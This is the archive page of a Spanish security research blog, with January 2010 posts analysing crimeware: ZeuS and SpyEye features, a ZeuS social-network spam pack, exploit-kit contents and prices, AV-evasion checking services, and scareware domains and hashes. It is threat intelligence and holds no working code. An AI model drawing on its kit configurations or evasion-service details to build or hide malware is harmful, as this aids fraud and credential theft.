MalwareIntelligence es un sitio dedicado a la investigación sobre todas las cuestiones relacionadas con criminología informática, seguridad de la información en general y seguridad antimalware en particular, siempre desde una perspectiva estrechamente relacionado con el campo de inteligencia.

31.1.10

Compendio mensual de información. Enero 2010

Malware Intelligence Blog - English version

28.01.10 ZeuS y el robo de información sensible

27.01.10 Automatización en la creación de exploits II
27.01.10 SpyEye. Nuevo bot en el mercado
22.01.10 Aprovechando ZeuS para enviar spam a través de redes sociales
16.01.10 Justificando lo injustificable de un mundo delictivo
16.01.10 YES Exploit System. Official Business Partner’s
09.01.10 Napoleon Sploit. Frameware Exploit Pack
09.01.10 Una recorrida por los últimos scareware XX
05.01.10
El crimeware durante el 2009
04.01.10 Crimeware-as-a-Service y mecanismos de evasión antivirus
03.01.10 Estado del arte en Eleonore Exploit Pack
02.01.10 Waledac. Línea de tiempo '07-'09
01.01.10 Waledac vuelve con otra estrategia de ataque

Malware Disasters Team - A division of Malware Intelligence
05.01.10
Crimeware in 2009

Evil Fingers Blog

25.01.10 Justifying the unjustifiable in a world criminal
25.01.10 YES Exploit System. Official Business Partner’s
05.01.10 Crimeware in 2009

ESET Latinoamérica Blog
31.01.10 Reporte de amenazas de Enero
28.01.10 Listado de programas de seguridad falsos IX
21.01.10 ¿Qué es Operación Aurora?
12.01.10 Crimeware-as-a-Service: un modelo delictivo en aumento
06.01.10 Masiva campaña de infección a través de archivos PDF
05.01.10 Malware en entornos empresariales
04.01.10 Reporte de amenazas de Diciembre


Información relacionada
Diciembre - Noviembre - Octubre - Septiembre - Agosto - Julio
Junio - Mayo - Abril - Marzo - Febrero - Enero


Compendio mensual de información 2009

Diciembre - Noviembre - Octubre - Septiembre - Agosto - Julio
Junio - Mayo - Abril - Marzo - Febrero - Enero


Jorge Mieres

Ver más

28.1.10

ZeuS y el robo de información sensible

A la luz de todos los troyanos bancarios recientes, a continuación pueden observar dos ejemplos del módulo keylogging que incorpora la botnet ZeuS. Estos módulos están registrando información de las pulsaciones del teclado y de las credenciales de acceso al Bank of America (Banco de las Américas) y Paypal.

Ambas imágenes son ejemplos de las capacidades que poseen las últimas versiones de ZeuS. Esto y los keyloggers abren la bóveda de un banco para estos grupos organizados de cibercriminales que operan en todo el mundo. Aquí está la puerta que les permite transferir su dinero para el blanqueo de las redes mulas, y luego volver a ellos.



Las características que se muestran aquí junto con el keylogger que transmite la información al C&C, abre muchas puertas para las tareas de espionaje. Estos troyanos abren sus compuertas.

Para ver algunos ejemplos de lo que aquí se comenta, recomendamos ver el blog de Brian Krebs, ya que en este cubre, entre otras cosas, los troyanos de acceso remoto (RAT) y el robo de banco en línea.

Información relacionada
Aprovechando ZeuS para enviar spam a través de redes sociales
ZeuS Botnet y su poder de reclutamiento zombi
ZeuS, spam y certificados SSL
Eficacia de los antivirus frente a ZeuS
Especial!! ZeuS Botnet for Dummies
Botnet. Securización en la nueva versión de ZeuS
Fusión. Un concepto adoptado por el crimeware actual
ZeuS Carding World Template. (...) la cara de la botnet
Entidades financieras en la mira de la botnet Zeus II
Entidades financieras en la mira de la botnet Zeus I
LuckySploit, la mano derecha de Zeus
ZeuS Botnet. Masiva propagación de su troyano II
ZeuS Botnet. Masiva propagación de su troyano I

Ben Koehl
Crimeware Researcher en Malware Intelligence

Ver más

27.1.10

Automatización en la creación de exploits II

La explotación de vulnerabilidad representa en la actualidad una de las estrategias de infección más utilizadas en el escenario del crimeware, y si bien los exploits que permiten aprovechar ciertas debilidades no constituyen un concepto nuevo, lo cierto es que cada vez son más notorias sus acciones.

De hecho actualmente se siguen explotando, sobre todo a través de exploits pack, una gran cantidad de vulnerabilidades que muchas de ellas han sido solucionadas hace más de dos años.

Sin embargo, cuando estas vulnerabilidades son del tipo 0-Day, el problema se potencia. Casos como "Operación Aurora" que recientemente ha estado en boca de todos al explotar una vulnerabilidad del tipo 0-Day en Internet Explorer 6. Sí, leyeron bien… Internet Explorer 6; y que actualmente se está utilizando de forma masiva para diseminar malware pero no solo a través de la versión 6, sino también de la 7 y 8.

La vulnerabilidad está identificada como CVE-2010-0249, y al igual que sucedió con la vulnerabilidad explotada por el gusano conficker (MS08-067) donde se automatizó su creación, recientemente se ha conocido un constructor que permite automatizar la creación del exploit para Internet Explorer de forma extremadamente sencilla, cuestión que es habitual en este tipo de aplicaciones.

Esta aplicación es de origen chino y solo permite configurar la dirección web desde donde se intentará explotar la debilidad en el navegador. Luego genera un archivo llamado IE.html conteniendo el código del exploit y la url utilizada para el ataque, que se encuentra ofuscada.

Como condimentos relevantes de este asunto, el exploit generado (embebido en el html) es detectado por menos del 40% de las compañías antivirus según el reporte de virutotal. Mientras que el constructor es detectado, por el momento, por menos del 25%.

Por otro lado, la automatización de exploits genera una brecha dejando al descubierto que muchas operaciones "encubiertas" que forman parte de campañas de distracción tras simples ataques, se encuentran íntimamente relacionadas con asuntos de espionaje.

Información relacionada
Automatización en la creación de exploits
Automatización de procesos anti-análisis II
Automatización de procesos anti-análisis a través de crimeware

Jorge Mieres

Ver más

SpyEye. Nuevo bot en el mercado

SpyEye, un bot cuya primera versión fue lanzada el 2 de enero de este mismo año (2010), es un programa "fresco" de características interesantes, y que lleva un progreso bastante rápido, siendo que en estas fechas ya se encuentra en su versión 1.0.65.

Fue desarrollado casi en su totalidad en C++, y el binario posee un tamaño que ronda los 60kb.
Trabaja desde Windows 2000 hasta Windows 7, ejecutándose desde ring3 (lo que posiblemente lo haga detectable a herramientas como GMER).

Algo para recalcar, es que al día de su lanzamiento la tasa de detección era básicamente nula y su precio base es de USD 500. Algunas de las características que ofrece al momento son:
  • FormGrabbing. Un tipo de Keylogging avanzado que intercepta información en los exploradores, con soporte para Firefox, IE, Maxthon y Netscape.
  • CC Autofill. Módulo que básicamente automatiza el proceso de fraudes de tarjeta de crédito y reporta sumas de dinero al dueño de la botnet
  • Panel de Administración PHP-MYSQL
  • Envío de backups diarios de la base de datos por email
  • Cifrado de string-sources del ejecutable
  • Grabbing para FTP. Total Commander, Notepad++, FileZilla y otros
  • Grabbing para POP3
  • Invisibilidad en la lista de procesos, archivo invisible, invisible en autorun (registro)
Como dice el autor, el producto en cuestión es estable, y tiene una tasa de permanencia del 30%.
Como podemos ver, esta industria se encuentra en un proceso de constante crecimiento y sofisticación, algo que después de todo, es bastante alarmante.

Información relacionada
Estado del arte en Eleonore Exploit Pack
Siberia Exploit Pack. Otro paquete de explois In-the-Wild
RussKill. Aplicación para realizar ataques de DoS
DDoS Botnet. Nuevo crimeware de propósito particular
JustExploit. Nuevo Exploit Kit que explota Java
ZoPAck. Nueva alternativa para la explotación de v...
ZeuS Botnet y su poder de reclutamiento zombi

Mariano Miguel
Malware Researcher en Malware Intelligence

Ver más

22.1.10

Aprovechando ZeuS para enviar spam a través de redes sociales

Hemos podido analizar un pack para convertir los zombis de ZeuS en distribuidores de spam a través de redes sociales. En concreto, el módulo analizado se encuentra desarrollado para ser usado en Vkontakte.ru, el clon ruso de Facebook.

Este crimeware ha sido creado por alguien que se hace llamar Deex, del Freedomscripts Team y se vende al módico precio de USD 100 (vía WebMoney).

El pack incluye varios ficheros donde realizar la configuración del mismo:

  • config.ini: lleva definido el target (friends u online, aunque de momento sólo parece funcionar la primera opción) y la contraseña del administrador del panel de control. Al seleccionar friends, se enviarán los mensajes a todos nuestros contactos, aunque no estén en línea en ese momento.
  • message.txt: contiene el texto del mensaje a enviar.
  • title.txt: contiene el título del mensaje a enviar.
  • results.txt: aquí se van guardando las estadísticas de los usuarios infectados (identificador en vkontakte, IP y número de mensajes enviados).
  • webinjects.txt: el código HTML que se inyectará en la sesión del PC infectado y disparará el envío de spam.

El contenido de este último fichero debe añadirse (o sustituir completamente) al fichero del mismo nombre necesario para generar los binarios de ZeuS, y a continuación reconstruir el fichero de configuración y el ejecutable de ZeuS.

Una vez que la PC de la víctima se infecta con este ejecutable, además de enviar a ZeuS los típicos reportes, chequeará la página que visitamos y en caso de ser la de Vkontakte.ru y además estar en inglés (no funciona en otros idiomas), activará la inyección de código en la página, que en todo momento mantiene la apariencia de la auténtica.

A partir de ese momento, todas las peticiones HTML son procesadas por la página getconfig.php que se encarga de llamar posteriormente a la auténtica página para evitar sospechas, mostrando al usuario el contenido real de vkontakte.ru a medida que navega por sus páginas; mientras que por debajo, envía un mensaje cada vez que se pulsa un enlace desde la página js.php, como se puede ver en el siguiente fragmento del log:

El resultado se puede ver en los elementos enviados, donde aparecen todos los mensajes que se han ido mandando a nuestros contactos:

Todo esto se administra desde un panel de control independiente al de ZeuS, que no necesita de base de datos para funcionar, ya que configuración y reportes van en sendos ficheros de texto.

El panel de control es bastante simple. Tiene una página de login en blanco, con una casilla para poner la contraseña que da acceso al propio panel, con un menú de 5 opciones:

  • Reports: muestra el resultado del envío de spam. En nuestro ejemplo, el ID ha enviado 20 mensajes desde la IP indicada.

  • Inject: muestra el código inyectable (webinjects.txt) y enlaces a las tres páginas encargadas de realizar las tareas propias del envío.

  • Settings: desde aquí se pueden gestionar los ficheros de configuración para cambiar la contraseña y establecer el título y el cuerpo del mensaje a enviar. Estos datos se guardan en los ficheros de configuración mencionados anteriormente.

  • Help: una breve página con alguna indicación de qué es este pack y de las dos partes que lo componen: Inject y Admin.

  • Logout. Para abandonar el panel de control.

Resumiendo, este paquete muestra lo sencillo que resulta aprovechar los zombis pertenecientes a una botnet bajo el control de ZeuS para realizar envíos de mensajes a través de las redes sociales.

Aunque este caso concreto sólo afecta, en primera instancia, a Vkontakte.ru, adaptarlo a otras redes sociales o utilizarlo para realizar otro tipo de ataques a través de páginas web, como realizar clicks fraudulentos, sería bastante fácil.

Información relacionada
ZeuS Botnet y su poder de reclutamiento zombi

ZeuS, spam y certificados SSL
Eficacia de los antivirus frente a ZeuS
Especial!! ZeuS Botnet for Dummies
Botnet. Securización en la nueva versión de ZeuS
Fusión. Un concepto adoptado por el crimeware actual
ZeuS Carding World Template. (...) la cara de la botnet
Entidades financieras en la mira de la botnet Zeus II
Entidades financieras en la mira de la botnet Zeus I
LuckySploit, la mano derecha de Zeus
ZeuS Botnet. Masiva propagación de su troyano II
ZeuS Botnet. Masiva propagación de su troyano I

Ernesto Martin

Crimeware Researcher en Malware Intelligence

Ver más

16.1.10

Justificando lo injustificable de un mundo delictivo

Como muchos de los lectores sabrán, desde Malware Intelligence venimos investigando las implicancias directas de toda esta nueva generación de códigos maliciosos y actividades delictivas que día a día retro-alimentan el negocio del crimeware.

Bajo esta premisa, las investigaciones centran sus esfuerzos en tratar de revelar las diferentes ramificaciones que se enredan entre sí dentro de una maraña de acciones ilícitas tendientes, fundamentalmente, a obtener dinero de los usuarios a través de técnicas no-éticas. Y en función de esto… ¿aún quedan dudas que estamos frente a un gran negocio que lucra a través de actividades que rozan la ilegalidad? (obviamente, siempre de acuerdo a la legislación vigente de cada país). Creo que la respuesta unánime es NO.

Salvada esta apreciación, luego de tanto exponer contenido en torno al estado del arte del crimeware, incluso aún sin exponer datos relevantes para no entorpecer la continuidad de las investigaciones, ya se ha tornado un aspecto común recibir mensajes y comentarios, en su mayoría agresivos, de los responsables del desarrollo o de la comercialización de determinadas aplicaciones crimeware.

Bajo este escenario, y si bien no soy de dar explicaciones sobre las investigaciones que realizamos, en esta oportunidad haré una excepción exponiendo dos de los últimos comentarios que hemos recibido de parte de quienes forman parte del negocio del crimeware.

Sobre todo, porque en cierta forma reflejan la filosofía (de vida y mental) de quienes operan desde la clandestinidad, aunque últimamente las cosas están cambiando.

El primero de los casos es un mensaje anónimo, no-agresivo que en lo personal debo confesar que… muy simpático :) dejado por uno de los Partners que comercializa el crimeware YES Exploit System. El comentario fue dejado en el artículo que habla de este Exploit pack, y en el cual también encontrarán mi respuesta. El comentario es el siguiente:

YES, We are the blackhats :)
Thanks for small review, but why do ppl think that blackhats are poor guyz?
It's just a business, no less, no more :) Do you wanna buy our excellent product? - there is discounts for you ;)


Como dicen mis "amigos", para ellos es "solo un negocio, ni más ni menos". Sin embargo, convengamos en que, además de no ser un negocio convencional, representa un modelo de negocio que colabora directa y activamente con actividades delictivas, lo cual no es tan gracioso.

Ahora, YES Exploit System es un crimeware que posee mucho desarrollo en su código y cuyo valor en el mercado es de USD 800. Y lo que sí resulta gracioso (según la última oración del cometario) es saber que no obtendré descuento alguno sobre el crimeware ;)

El segundo caso que quiero dar a conocer es un poco más agresivo y fue en función de lo escrito en el informe sobre el servicio ruso destinado a comprobar la detección de malware, en el mismo pueden leer el comentario y mi respuesta, la cual no transcribo aquí por su longitud. El mensaje dice así:

"In summary, further evidence that not only the exploitation of malware generates profits but also moves parallel money on services to
this industry. And in some cases like the present one, have to see if you can consider this service as a criminal act or not."

Wow and why would this service be criminal act?

It's clear to me that someone has a year work in a software like this scanner and he want to make money with it.
If you don't like it don't use it. Noone forces you to pay for it or submit files there but since I see you are a little wanker
blogger who does not respect others work I giving it to you straight.

You have no inside experience in the antivirus industry whatsoever otherwise you would know that VirusTotal distributes 200K files/day
to antivirus companies for FREE. AV companies are shit on online scanners, they wouldn't even contact you if you would ask them about file
distribution and they definately wouldn't support an online scanner so what else can these services do to remain online?

Before you criticizing others work put something down on the table little frustrated shit..."

Independientemente de la connotación agresiva que presenta este segundo comentario, lo interesante es de quien viene. Alguien que utiliza como nick la palabra "KLESK" y responsable de "un intento de negocio" completamente delictivo, en cuya página una de las primeras cosas que leemos es "Selling corporate data, trade secrets" (Venta de datos corporativos, secretos comerciales).

"We sell corporate data and trade secrets" (Nosotros vendemos los datos corporativos y los secretos comerciales), continúa la propaganda. Aclarando además qué tipo de información supuestamente "roban" a las empresas, y rematando con algo muy curioso:

"Please losers/asszors stay away, all the data bids start on 5 figures" :: Sin palabras… :)

En fin, particularmente este último caso representa una buena oportunidad para analizar la psicología de un prospecto a ciber-delincuente cuyo intento de "negociar" no sólo deja mucho que desear sino que ni siquiera puede ser evaluado como una posibilidad a tener en cuenta como objeto de investigación.

Información relacionada
Russian service online to check the detection of malware
YES Exploit System. Otro crimeware made in Rusia

Jorge Mieres

Ver más

YES Exploit System. Official Business Partner’s

Sin lugar a dudas, el negocio que representa el crimeware en la actualidad se expande cada día más. No sólo se refleja este aspecto en la profesionalización en torno al desarrollo y explotación de las diferentes aplicaciones y tecnologías informáticas empleadas para delinquir y realizar ataques vía web, sino también en las estrategias de venta que se emplean para canalizar la atención de un mayor volumen de mentes inquietas, que buscan obtener robar el dinero de los demás empleando como base de negocio, alguna botnet.

Si bien aún el 90% de la venta de crimeware se lleva a cabo en un ambiente underground donde la oferta es propuesta directamente por el creador del crimeware, los ciber-delincuentes están llevando su negocio clandestino a un plano "más claro" y "más alto", publicitando sus desarrollos a través de sitios web exclusivamente diseñados para ofrecer sus "servicios", pero a través de "asociados de negocio" que se encargan de la logística del asunto.

A principios del año 2009 mencionábamos el caso de la venta, vía web, de Unique Sploit Pack, uno de los exploit pack de propósito general más demandados en la actualidad, cuyo sitio web de comercio estuvo online un tiempo hasta que fue dado de baja precisamente por tratarse de un crimeware.

Sin embargo, esta estrategia de marketing y venta vuelve al plano mayor de la mano de YES Exploit Pack, otro crimeware de los más activos actualmente.

Bajo el slogan "Improve your business with YES Exploit System. Exploit Pack from Russia" (Mejore su negocio con YES Exploit System. Un Exploit pack desde Rusia) se propone la venta de la versión 2 de este exploit pack a través de un sitio web registrado en Rusia.

La campaña de propaganda (estrategia de marketing) desde el sitio web radica en explicar brevemente cuáles son las características más sobresalientes del crimeware, a modo de justificar por qué es mejor que otros paquetes de su estilo (la competencia). Su costo es de USD 800 y la transacción se realiza, como habitualmente se hace, a través de WebMoney.

El negocio del crimeware expande sus recursos logísticos y esto evidentemente es una prueba fiel que manifiesta la evolución de un mercado clandestino, o ya no tan clandestinos, cuyos retos no solo radican en aspectos técnicos buscando alternativas que permitan evadir los mecanismos de análisis.

Información relacionada
YES Exploit System. Otro crimeware made in Rusia
YES Exploit System. Manipulando la seguridad del atacante
El crimeware durante el 2009
Los precios del crimeware ruso. Parte 2
Comercio Ruso de versiones privadas de crimeware...
Panorama actual del negocio originado por crimeware

Jorge Mieres

Ver más

9.1.10

Napoleon Sploit. Frameware Exploit Pack

Se trata de la primera versión de un Exploit Pack para el monitoreo de botnets con propósito particular llamado Napoleon Sploit, que se lanzó al mercado clandestino de crimeware en agosto del 2009.

Debido a su prematura y baja condición de "complejo Exploit Pack" si lo comparamos con otros de su estilo, posee un bajo costo y de hecho no ha tenido repercusión en el circuito de venta underground, aunque todavía se encuentra a la venta por un costo de USD 299 con la posibilidad de obtener las actualizaciones importantes por USD 35 más.

Como podemos apreciar en la imagen, su interfaz es muy sencilla y minimalista. Sólo posee dos módulos (estadística y configuración) más el panel de autenticación (logín vía web), y según su autor, el estilo del crimeware con colores claros está pensado para no provocar cansancio en la vista de los ciber-criminales, “futuros clientes”.

(Sin palabras, pero espero opiniones al respecto). La siguiente imagen corresponde al panel de configuración.

El Exploit pack se encuentra diseñado para aprovechar las vulnerabilidades específicas en función de los siguientes exploits:
  • MDAC - IE5, IE6
  • Opera Telnet - Opera 9.00 - 9.27
  • PDF Util.Printf - PDF Adobe Reader < 8.1.2
  • PDF Collab.Geticon PDF Util.Printf - Adobe Reader & Acrobat > 8.1.2
Un detalle que no quiero dejar pasar es que este crimeware es el antecesor de Siberia Exploit Pack, otra aplicación web de propósito particular desarrollada por el mismo autor que Napoleon Sploit, que se encuentra In-the-Wild.

Información relacionada
Estado del arte en Eleonore Exploit Pack
Siberia Exploit Pack. Otro paquete de explois In-the-Wild
RussKill. Aplicación para realizar ataques de DoS
JustExploit. Nuevo Exploit Kit que explota Java
DDoS Botnet. Nuevo crimeware de propósito particular
ZeuS Botnet y su poder de reclutamiento zombi
Phoenix Exploit’s Kit. Otra alternativa para el control de botnets
iNF`[LOADER]. Control de botnets, marihuana y propagación de malware
Fragus. Nueva botnet framework In-the-Wild
Liberty Exploit System. Otra alternativa crimeware para el control de botnets

Jorge Mieres

Ver más

Una recorrida por los últimos scareware XX

Anti-Virus Live 2010 = Anti-Virus Elite 2010, ErrorClean y NoAdware
MD5: c50dc619e13345dec2444b0de371dfd4
IP: 204.232.131.12
204.232.131.14
United States United States Hoboken Noadware.net
Dominios asociados
antivirus-live.com
Result: 9/41 (21.95%)

NoMalware
IP: 88.214.204.221 - 72.9.100.114
United Kingdom United Kingdom Hosting Solutions Ltd
United States United States New York Access Integrated Technologies Inc
Dominios asociados
ontogen.com
nomalwares.org
nomalwarelab.com


Malware Mechanic

MD5: ce48aeb8e8b007b601a7f584d1b7901c
IP: 72.9.100.115
United States United States New York Access Integrated Technologies Inc
Dominios asociados
malwaremechanic.com



newsneg.ru, back-shure.ru, year-sneg.ru, yearsneg.ru, night-up.ru, nightup.ru, snegyear.ru, sneg-new.ru, up-day.ru, (91.213.29.15) - Russian Federation Russian Federation Info-media Ltd
world-info2.com (193.104.22.202) - Malta Malta Kratosweb-net
anyboom.biz (88.214.204.236) - United Kingdom United Kingdom Hosting Solutions Ltd
sekuritylistsite.com (94.102.63.245) - Netherlands Netherlands Amsterdam The King Host
online-antispym2.com (68.168.212.142) - United States United States Secaucus Honelive
bestsekuritylist.com (193.169.234.3) - Jamaica Jamaica Titan-net Ltd
coolsecuritylist.com (212.150.107.40) - Israel Israel Tel Aviv Loads

Información relacionada
Una recorrida por los últimos scareware XIX
Una recorrida por los últimos scareware XVIII
Una recorrida por los últimos scareware XVII
Una recorrida por los últimos scareware XVI
Una recorrida por los últimos scareware XV
Una recorrida por los últimos scareware XIV
Una recorrida por los últimos scareware XIII
Una recorrida por los últimos scareware XII
Una recorrida por los últimos scareware XI
Una recorrida por los últimos scareware X
Una recorrida por los últimos scareware IX
Una recorrida por los últimos scareware VIII
Una recorrida por los últimos scareware VII
Una recorrida por los últimos scareware VI
Una recorrida por los últimos scareware V
Una recorrida por los últimos scareware IV
Una recorrida por los últimos scareware III
Una recorrida por los últimos scareware II
Una recorrida por los últimos scareware

Jorge Mieres

Ver más

5.1.10

El crimeware durante el 2009

"El crimeware durante el 2009" plasma en un solo documento todo lo que se canalizó a través de este blog durante el año en cuestión en materia de crimeware y amenazas asociadas.

Cuenta con un total de 262 páginas y se encuentra dividido por las temáticas más relevantes que describen las actividades delictivas que fueron motivo de noticias en este blog. Posee dos índices que permiten encontrar las noticias de forma sencilla (índice de contenido), y otro sobre las imágenes (índice de imágenes).

A continuación dejo alguna de las temáticas que encontraran en el documento en cuestión:
  • Panorama actual de negocio ocasionado por crimeware
  • Framework Exploit Pack para botnets de propósito general
  • Framework Exploit Pack para botnets de propósito particular
  • Servicios asociados al crimeware
  • Inteligencia en la lucha contra el crimeware
  • Campañas de propagación e infección
  • Otros Exploits Pack que se investigaron
Información
Malware Intelligence
Compendio anual de información. El crimeware durante el 2009
262 páginas
Idioma español

Descarga

Jorge Mieres

Ver más

4.1.10

Crimeware-as-a-Service y mecanismos de evasión antivirus

Los modelos de negocio que ofrece el Cloud Computing no son novedosos. Incluso, muchos servicios que en la actualidad se ofrecen bajo esta bandera poseen un modelo ya implantado hace mucho tiempo en el mercado.

Sin embargo, el concepto Cloud Computing en sí mismo que conocemos en la actualidad responde a una orientación netamente inclinada a generar negocios aprovechando Internet como infraestructura, lo cual en un mercado altamente competitivo goza de ciertas ventajas con respecto al negocio convencional.

Bajo este escenario, lo cierto es que esta manera de crear negocios también fue aceptada y puesto en marcha por quienes cotidianamente lucran a través de una batería de programas diseñados con fines fraudulentos que cuando son utilizados a través de Internet, reciben el término de Crimeware-as-a-Service, o también por su acrónimo CaaS.

De esta manera comienzan a gestarse servicios fraudulentos que buscan automatizar la manipulación de malware en un proceso creado exclusivamente para evadir su detección. Un ejemplo de esto lo es el servicio (que hoy ya no existe), llamado PoisonIvy Polymorphic Online Builder, creado para cifrar malware y del cual hablamos en su momento. En este caso, al manipular solamente códigos maliciosos, este tipo de servicio se aglomera bajo el término de Malware-as-a-Service (MaaS).

Del mismo modo, en la actualidad existen servicios desarrollados con fines de lucro y destinados a alimentar el negocio del crimeware a través de mecanismos que permiten verificar el grado de efectividad del malware frente a los motores de detección antivirus.

Estos servicios constituyen el antónimo de otros altamente empleados por los profesionales de seguridad como por ejemplo VirusTotal de la compañía español Hispasec. Sobre uno de ellos también ya hemos hablado, llamado VirTest.

Sin embargo, existen algunos otros como Private antivirus service (creado en el 2008), que al igual que VirTest es de origen ruso y busca obtener un beneficio económico a través de un servicio pago, pero al mismo tiempo colaborar con el ambiente del ciber-crimen ofreciendo la posibilidad de chequear el malware creado para conocer su índice de detección en determinado momento, asegurándose además, que el binario no será compartido con las compañías antivirus. De esta manera, se asegura el anonimato y un ciclo de vida más prolongado para la amenaza.

El servicio fraudulento permite verificar la efectividad del malware frente a 17 motores de los antivirus más conocidos del mercado antimalware, y como se visualiza en la primera captura, existen tres costos en función de la característica de los "contratado":
  • USD 0.2 por chequeo
  • USD 15 por 10 chequeos limitados diariamente
  • USD 20 por chequeos sin límites
Una vez dentro del sistema, desde la solapa AV check, se suben los binarios que serán sometidos al escaneo de los antivirus, ofreciendo luego el reporte y un historial de los archivos subidos. Estas opciones se encuentran en el ángulo inferior izquierdo.

Un aspecto interesante que ofrece este servicio de crimeware, lo constituye la posibilidad de programar tareas de verificación, a través de la segunda solapa llamada Programador.

Esta opción permite, por un lado, subir un archivo malicioso desde el disco duro del creador del malware; y por el otro, seleccionar un malware que ya se encuentre en el circuito de propagación a través de la URL; es decir, que el ciber-delincuente puede verificar y controlar la detección de o los códigos maliciosos que ya este propagando.

De esta forma y a través del "programador", se planifica la frecuencia de chequeo de los códigos maliciosos subidos en función de una serie de parámetros que se eligen según un tiempo establecido que van en el rango de 3, 6, 12 horas, ó 1 y 3 días.

Estos parámetros son configurables y una vez establecido pueden ser visualizados en una tabla que se muestra en la misma ventana. La tercera columna corresponde al rango de tiempo. También se configura la manera en que desplegará una alerta con el reporte, que puede ser a través de un correo electrónico o a través de ICQ.

Claramente estas opciones están ideadas pensando en agilizar las maniobras delictivas de propagación de malware chequeando, en el menor de los tiempos, cada 3 horas para verificar si la amenaza es detectada por las compañías antivirus. Esto permite cambiar el malware cada vez que sea necesario, y hasta combinar el servicio con otros como por ejemplo el "servicio" mencionado líneas arriba para cifrar los archivos.

Evidentemente quienes forman parte de la cadena delictiva del negocio del crimeware, colaboran entre sí por intermedio de diferentes alternativas, conformando también un negocio paralelo que también se nutre de las actividades delictivas.

Información relacionada
Servicio ruso en línea para comprobar la detección de malware
Software as a Service en la industria del malware
Creación Online de malware polimórfico basado en PoisonIvy

Jorge Mieres

Ver más

3.1.10

Estado del arte en Eleonore Exploit Pack

Desde el lanzamiento de la primera versión, en junio del 2009, Eleonore Exploit Pack goza de un importante impacto en el ámbito criminal, tanto desde la demanda de obtener el Exploit Pack debido a su costo competitivo respecto a las aplicaciones web similares, como por su alto índice de actividad.

Actualmente cuenta con un repertorio de 6 (seis) versiones, siendo la última la 1.3.2, de reciente aparición en la escena underground a un costo de USD 1000.

Esto significa que su autor, ExManoize, fue actualizando el paquete aproximadamente cada mes, lo que da una idea concreta del esfuerzo depositado en su desarrollo, y que obviamente no es por vocación sino que responde y forma parte del negocio fraudulento, colaborando con la creación y mantenimiento de una de las "herramientas" utilizadas en el campo delictivo.

La estructura de este crimeware es bastante compleja y cuenta con un repertorio total de 13 (trece) exploits por defecto que se incluyen en el paquete y que son los siguientes:
  • MDAC. Funciona en MSIE
  • MS009-02. Funciona en MSIE
  • ActiveX pack. Funciona en MSIE
  • compareTo. Funciona en Firefox
  • JNO (JS navigator Object Code). Funciona en Firefox
  • MS06-006. Funciona en Firefox
  • Font tags. Funciona en Firefox
  • Telnet. Funciona en Opera
  • PDF collab.getIcon. Funciona en todos los navegadores
  • PDF Util.Printf. Funciona en todos los navegadores
  • PDF collab.collectEmailInfo. Funciona en todos los navegadores
  • PDF Doc.media.newPlayer. Funciona en todos los navegadores
  • Java calendar. Funciona en todos los navegadores
Obviamente, como todo servicio que se ofrece dentro de un modelo de mercado, y el crimeware lo es incluyendo este, el "prestador" garantiza el soporte, las actualizaciones y limpieza del paquete en caso de ser necesario. ¡Todo un negocio!

Desde el punto de vista histórico, las actualizaciones de Eleonore Exploit Pack son las siguientes:
  • En junio de 2009 se pone a disposición del público la venta de Eleonore Exploit Pack v1.0, conteniendo los exploits para MDAC, MS009-02, Snapshot, Telnet (para opera), PDF collab.getIcon, PDF Util.Printf, PDF collab.collectEmailInfo. Su valor fue, en principo, de USD 599.
  • En julio de 2009 se actualiza a la versión 1.1 y se agregan dos exploits más: Font tags que explota en Firefox 3.5 y DirectX DirectShow que explota en IE 6 y 7. Además, se realizan mejoras en el cifrado de los scripts. Su valor fue de USD 500, y la versión anterior bajo el precio a USD 300.
  • Durante el mismo mes de julio, se agrega el exploit Spreadsheet, se modifican los archivos PDF, se elimina la captura de imágenes y se agrega la capacidad de cargar un archivo a través del propio panel de administración. La versión es denominada 1.2 y su costo se establece en USD 700.
  • Luego de un periodo de tres meses sin actualizaciones, en octubre aparece la versión 1.3, incorporando en el paquete más funcionalidades fraudulentas. Entre ellas, algunas "mejoras" en los exploits para Internet Explorer y se agrega Java D&E. EL costo de esta versión fue de USD 1000.
  • En noviembre comienza la comercialización de la versión 1.3.1, donde se continúan puliendo los exploits y, entre otros, se agrega el archivo Robots.txt para mejorar el indexado y evitar que ciertas carpetas se muestren. El precio se mantuvo en USD 1000.
  • Durante este periodo de tiempo, se podía encontrar In-the-Wild una versión beta privada (1.3B).
  • El 16 de diciembre, aparece la última versión, 1.3.2 que agrega Java calendar y un Exploit para la reciente vulnerabilidad PDF Doc.media.newPlayer, que hasta ese entonces se trataba de un 0-Day. Su valor no se modificó.
Desde el punto de vista del empleador, la infraestructura para manejar el negocio de las botnets consiste en armarla y ponerla en funcionamiento a través de un servidor dedicado que también puede ser contratado. Sin embargo, para obtener el beneficio económico se necesita de las zombis, ya que sin ellas no se podrían optimizar las tareas fraudulentas para las cueles están pensadas. De hecho, que el paquete se actualice con bastante regularidad, demuestra que los réditos que se obtienen a través de estas actividades son importantes.

Por otro lado, independientemente del costo que posee el crimeware, existen "servicios extras" ofrecidos por el desarrollador, que no están incluidos en el paquete original, como por ejemplo, la limpieza de la botnet por un costo USD 50, al igual que el cambio de dominio malicioso por el mismo valor, USD 50.

Alternativamente, los botmaster (que no necesariamente son los desarrolladores de la aplicación web) suelen alquilar su botnet de forma parcial, y en el caso de Eleonore Exploit Pack v1.3.2, su alquiler es de USD 40 por día.

Información relacionada
Siberia Exploit Pack. Otro paquete de explois In-the-Wild
RussKill. Aplicación para realizar ataques de DoS
JustExploit. Nuevo Exploit Kit que explota Java
DDoS Botnet. Nuevo crimeware de propósito particular
T-IFRAMER. Kit para la inyección de malware In-the-Wild
ZoPAck. Nueva alternativa para la explotación de vulnerabilidades
ZeuS Botnet y su poder de reclutamiento zombi
DDBot. Más gestión de botnets vía web
Phoenix Exploit’s Kit. Otra alternativa para el control de botnets
iNF`[LOADER]. Control de botnets, marihuana y propagación de malware

Hybrid Botnet Control System. Desarrollo de http bot en perl
Fragus. Nueva botnet framework In-the-Wild
Liberty Exploit System. Otra alternativa crimeware para el control de botnets
TRiAD Botnet III. Administración remota de zombis multiplataforma
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild


Jorge Mieres

Ver más

2.1.10

Waledac. Línea de tiempo '07-'09

El troyano waledac, encargado de reclutar zombis para alimentar una botnet dedicada al spam, recientemente volvió a dar noticia al utilizar como excusa la llegada del nuevo año 2010.

Sin embargo, sus actividades fraudulentas datan desde el año 2007 cuando se lo conoció bajo la nomenclatura de storm, y desde entonces, esta familia de malware se ha aprovechado de Ingeniería Social como principal estrategia de propagación bajo diversas coberturas.

